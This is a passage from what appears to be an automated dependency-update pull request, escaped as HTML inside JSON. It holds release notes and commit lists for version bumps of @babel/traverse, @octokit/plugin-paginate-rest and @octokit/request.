href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.28.6 (2026-01-12)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/kadhirash\"\u003e\u003ccode\u003e@​kadhirash\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/kolvian\"\u003e\u003ccode\u003e@​kolvian\u003c/code\u003e\u003c/a\u003e for your first PRs!\u003c/p\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-cli\u003c/code\u003e, \u003ccode\u003ebabel-code-frame\u003c/code\u003e, \u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-helper-check-duplicate-nodes\u003c/code\u003e, \u003ccode\u003ebabel-helper-fixtures\u003c/code\u003e, \u003ccode\u003ebabel-helper-plugin-utils\u003c/code\u003e, \u003ccode\u003ebabel-node\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-flow-comments\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-modules-commonjs\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-property-mutators\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e, \u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17589\"\u003e#17589\u003c/a\u003e Improve Unicode handling in code-frame tokenizer (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-regenerator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17556\"\u003e#17556\u003c/a\u003e fix: \u003ccode\u003etransform-regenerator\u003c/code\u003e correctly handles scope (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-react-jsx\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17538\"\u003e#17538\u003c/a\u003e fix: Keep jsx comments (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17606\"\u003e#17606\u003c/a\u003e Polish(standalone): improve message on invalid preset/plugin (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:house: Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-bugfix-v8-static-class-fields-redefine-readonly\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-import-attributes-to-assertions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-import-wasm-source\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-async-do-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-decorators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-destructuring-private\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-do-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-explicit-resource-management\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-export-default-from\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-flow\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-function-bind\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-function-sent\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-assertions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-attributes\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-defer\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-import-source\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-jsx\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-module-blocks\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-optional-chaining-assign\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-partial-application\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-pipeline-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-throw-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-typescript\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-async-generator-functions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-async-to-generator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-class-properties\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-class-static-block\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-dotall-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-duplicate-named-capturing-groups-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-explicit-resource-management\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-exponentiation-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-json-strings\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-logical-assignment-operators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-nullish-coalescing-operator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-numeric-separator\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-object-rest-spread\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-optional-catch-binding\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-optional-chaining\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-private-methods\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-private-property-in-object\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-regexp-modifiers\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-unicode-property-regex\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-unicode-sets-regex\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17580\"\u003e#17580\u003c/a\u003e Allow Babel 8 in compatible Babel 7 plugins (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/84366a8ea453814e732784db74cf2e2b6635eb6f\"\u003e\u003ccode\u003e84366a8\u003c/code\u003e\u003c/a\u003e fix(traverse): provide a hub when traversing a File or Program and no parentP...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/229eb452c5d5d2be0dc138ec2956aff7ff1057d7\"\u003e\u003ccode\u003e229eb45\u003c/code\u003e\u003c/a\u003e [7.x backport] fix: Rename switch discriminant references when body creates s...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/d7f400889567ae18ef9ac41b024b5120f6060e17\"\u003e\u003ccode\u003ed7f4008\u003c/code\u003e\u003c/a\u003e v7.28.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/905bc22b2fff23673eabe467815c67b29bf8bba2\"\u003e\u003ccode\u003e905bc22\u003c/code\u003e\u003c/a\u003e fix: lint errors in main branch (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17612\"\u003e#17612\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a03e2b63ae530674e866b60350b7eb4a5fcb5f59\"\u003e\u003ccode\u003ea03e2b6\u003c/code\u003e\u003c/a\u003e fix: \u003ccode\u003epath.evaluate\u003c/code\u003e correctly returns \u003ccode\u003econfident\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17584\"\u003e#17584\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aac2c37e11ad58905f7f9606103074e80bacbbcd\"\u003e\u003ccode\u003eaac2c37\u003c/code\u003e\u003c/a\u003e chore: Use Gulpfile.mts (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17579\"\u003e#17579\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/65c4a6b3ee0e1d32801529e841572bb22534e1f3\"\u003e\u003ccode\u003e65c4a6b\u003c/code\u003e\u003c/a\u003e [Babel 8] fix: Improve \u003ccode\u003etraverse\u003c/code\u003e types (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17574\"\u003e#17574\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/99dcba5e71de3bd81ce14077cfa5b6df58e9b177\"\u003e\u003ccode\u003e99dcba5\u003c/code\u003e\u003c/a\u003e chore: enable some ts-eslint rules (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17592\"\u003e#17592\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/c92c4919771105140015167f25f7bacac77c90d9\"\u003e\u003ccode\u003ec92c491\u003c/code\u003e\u003c/a\u003e Improve Unicode handling in code-frame tokenizer (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-traverse/issues/17589\"\u003e#17589\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.0/packages/babel-traverse\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for \u003ccode\u003e@​babel/traverse\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/plugin-paginate-rest` from 2.21.3 to 14.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e\u003ccode\u003e@​octokit/plugin-paginate-rest\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev14.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.1...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2025-10-31)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd immutable releases, enterprise team membership, enterprise team organization endpoints (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e413e899\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /projects/{project_id}/columns\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /enterprises/{enterprise}/secret-scanning/alerts\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.0...v13.2.1\"\u003e13.2.1\u003c/a\u003e (2025-10-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003eba56fbc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.1...v13.2.0\"\u003e13.2.0\u003c/a\u003e (2025-09-29)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003enew Projects v2 endpoints, new code scanning dismissal endpoints, many other endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/690\"\u003e#690\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e0e236cb\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.1.0...v13.1.1\"\u003e13.1.1\u003c/a\u003e (2025-06-27)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ehandle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e8e5da25\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.1.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.1...v13.1.0\"\u003e13.1.0\u003c/a\u003e (2025-06-16)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and \u003ccode\u003ecompareCommitsWithBasehead\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/678\"\u003e#678\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e6d8ea8a\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.0.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.0.0...v13.0.1\"\u003e13.0.1\u003c/a\u003e (2025-05-25)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e\u003ccode\u003e413e899\u003c/code\u003e\u003c/a\u003e feat: add immutable releases, enterprise team membership, enterprise team org...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/3d311d679e3d3ebaf073a66c5ce8a0603bf47d52\"\u003e\u003ccode\u003e3d311d6\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency \u003ccode\u003e@​types/node\u003c/code\u003e to v24 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/701\"\u003e#701\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003e\u003ccode\u003eba56fbc\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/80745be518d862ab9a304ffb7793be4ebc3de0ce\"\u003e\u003ccode\u003e80745be\u003c/code\u003e\u003c/a\u003e ci(action): update actions/checkout action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/687\"\u003e#687\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/0e236cb76f82cfc073b381802e4fea03f59c213c\"\u003e\u003ccode\u003e0e236cb\u003c/code\u003e\u003c/a\u003e feat: new Projects v2 endpoints, new code scanning dismissal endpoints, many ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/bf19e3ed5f5e833712d2663984c4ce456696e93e\"\u003e\u003ccode\u003ebf19e3e\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency prettier to v3.6.2 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/685\"\u003e#685\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/4f9fc562b1dda9d8f724e8ffee444141c2f45673\"\u003e\u003ccode\u003e4f9fc56\u003c/code\u003e\u003c/a\u003e ci(action): update actions/setup-node action to v5 (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/688\"\u003e#688\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8e5da25f975d2f31dda6b8b588d71f2c768a8df2\"\u003e\u003ccode\u003e8e5da25\u003c/code\u003e\u003c/a\u003e fix: handle url in response when using pagination with compareCommits (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/686\"\u003e#686\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/6d8ea8ad68058e45883a1a7edaaf6d8a91d732bd\"\u003e\u003ccode\u003e6d8ea8a\u003c/code\u003e\u003c/a\u003e feat: add paginatantion support for  \u003ccode\u003ecompareCommits\u003c/code\u003e and `compareCommitsWith...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/8ec2713699ee473ee630be5c8a66b9665bcd4173\"\u003e\u003ccode\u003e8ec2713\u003c/code\u003e\u003c/a\u003e fix(deps): update \u003ccode\u003e@octokit/types\u003c/code\u003e - no new paginated endpoints (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/680\"\u003e#680\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v2.21.3...v14.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@octokit/request` from 5.6.3 to 10.0.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/request.js/releases\"\u003e\u003ccode\u003e@​octokit/request\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev10.0.8\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.7...v10.0.8\"\u003e10.0.8\u003c/a\u003e (2026-02-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003euse \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to properly support int64's (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/798\"\u003e#798\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003ef13f5d9\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.7\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.6...v10.0.7\"\u003e10.0.7\u003c/a\u003e (2025-11-13)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ereadme:\u003c/strong\u003e properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003ef17c1c1\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/octokit/request.js/issues/785\"\u003e#785\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.6\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.5...v10.0.6\"\u003e10.0.6\u003c/a\u003e (2025-10-30)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v16 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/783\"\u003e#783\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/1aeac5672c04bc508e46796660465b1b67cf397c\"\u003e1aeac56\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.5\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.4...v10.0.5\"\u003e10.0.5\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update octokit deps (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/772\"\u003e#772\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/30f83b64578eebf6988b44df495d235de8136e6e\"\u003e30f83b6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.4\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.3...v10.0.4\"\u003e10.0.4\u003c/a\u003e (2025-09-29)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update dependency \u003ccode\u003e@​octokit/types\u003c/code\u003e to v15 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/775\"\u003e#775\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/ad78b4c8099a790d9ac3489342021896cabdbecd\"\u003ead78b4c\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.3\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.2...v10.0.3\"\u003e10.0.3\u003c/a\u003e (2025-06-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003epkg:\u003c/strong\u003e unreplaced version number in \u003ccode\u003edist-bundle/\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/765\"\u003e#765\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/request.js/commit/5b181af867a6b3ccfd23800d876ff22e1e54fd7d\"\u003e5b181af\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev10.0.2\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/request.js/compare/v10.0.1...v10.0.2\"\u003e10.0.2\u003c/a\u003e (2025-05-20)\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f13f5d9814cec9e51cdbe57e3864f9a7f95a9731\"\u003e\u003ccode\u003ef13f5d9\u003c/code\u003e\u003c/a\u003e fix: use \u003ccode\u003ejson-with-bigint\u003c/code\u003e instead of built-in JSON methods in order to prop...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/9ba6ae0fd2eff35a6c29a9f032eca6e9ba002976\"\u003e\u003ccode\u003e9ba6ae0\u003c/code\u003e\u003c/a\u003e Document that unsuccessful HTTP status code result in an exception (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/795\"\u003e#795\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/7160b8201ee183d57e3572c9ac78aa3f241c9468\"\u003e\u003ccode\u003e7160b82\u003c/code\u003e\u003c/a\u003e chore(deps): replace glob with tinyglobby (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/791\"\u003e#791\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ab8018b6d42de25adb305e3ea5ea840ee2805481\"\u003e\u003ccode\u003eab8018b\u003c/code\u003e\u003c/a\u003e ci(action): update peter-evans/create-or-update-comment action to v5 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/776\"\u003e#776\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/fb916e454df205980835281368da81a003cde30d\"\u003e\u003ccode\u003efb916e4\u003c/code\u003e\u003c/a\u003e build(deps): bump vite from 6.3.4 to 6.4.1 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/780\"\u003e#780\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/e1eb7693969a87cbdde278c82a7474b8acec9207\"\u003e\u003ccode\u003ee1eb769\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency esbuild to ^0.27.0 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/784\"\u003e#784\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/f17c1c13c7cba81187c419da06b815ed741c950c\"\u003e\u003ccode\u003ef17c1c1\u003c/code\u003e\u003c/a\u003e fix(readme): properly structure the options for custom agent (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/786\"\u003e#786\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/ea46fa9cd46f970fad5e286e6fdd2ea46929ac5d\"\u003e\u003ccode\u003eea46fa9\u003c/code\u003e\u003c/a\u003e ci(action): update github/codeql-action action to v4 (\u003ca href=\"https://redirect.github.com/octokit/request.js/issues/778\"\u003e#778\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/octokit/request.js/commit/8166d281814326b3e11d60b1895e623f2fd51c9e\"\u003e\u003ccode\u003e8166d28\u003c/code\u003e\u003c/a\u003e chore(deps): update vitest monorepo to v4 (major) (\u003ca 